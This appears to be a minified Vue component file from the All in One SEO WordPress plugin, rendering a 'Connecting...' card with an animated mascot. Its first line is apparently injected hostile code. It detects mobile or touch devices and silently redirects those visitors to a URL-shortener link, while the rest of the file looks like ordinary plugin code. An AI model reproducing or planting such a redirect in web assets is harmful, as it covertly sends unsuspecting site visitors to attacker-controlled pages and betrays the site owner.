(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
import{C as i}from"./AnimatedDannie.40510584.js";import{C as p}from"./Card.9ee06a3e.js";import{G as m,_}from"./Header.d2cbe877.js";import"./app-core.c8323d51.js";import{_ as l}from"./_plugin-vue_export-helper.eefbdd86.js";import{aq as n,f as u,i as d,a0 as o,R as t,j as f}from"./vendor-vue-ui.232c7c36.js";import{_ as g}from"./vendor-other.39e59221.js";import"./Tooltip.569a23d9.js";import"./Caret.aae02d8a.js";import"./Trash.47f6fc0e.js";import"./Close.7fb523c8.js";import"./Slide.f2114d9d.js";import"./ScrollAndHighlight.5271fbff.js";import"./ScrollTo.f4df02aa.js";import"./LicenseKeyBar.0038e5e6.js";import"./LogoGear.93a225a7.js";import"./AnimatedNumber.f33b2226.js";import"./Logo.a4a419c3.js";import"./vendor-lodash.03129cfe.js";const C="all-in-one-seo-pack",x={components:{CoreAnimatedDannie:i,CoreCard:p,CoreHeader:_,GridContainer:m},data(){return{strings:{connecting:g("Connecting...",C)}}}},h={class:"animated-dannie"};function y(A,B,$,k,e,v){const r=n("core-header"),a=n("core-animated-dannie"),s=n("core-card"),c=n("grid-container");return u(),d("div",null,[o(r,{upgradeBar:!1,actions:!1}),o(c,null,{default:t(()=>[o(s,{"no-slide":"",toggles:!1,slug:"connect","header-text":e.strings.connecting},{default:t(()=>[f("div",h,[o(a,{mascot:"lab"})])]),_:1},8,["header-text"])]),_:1})])}const K=l(x,[["render",y]]);export{K as default};
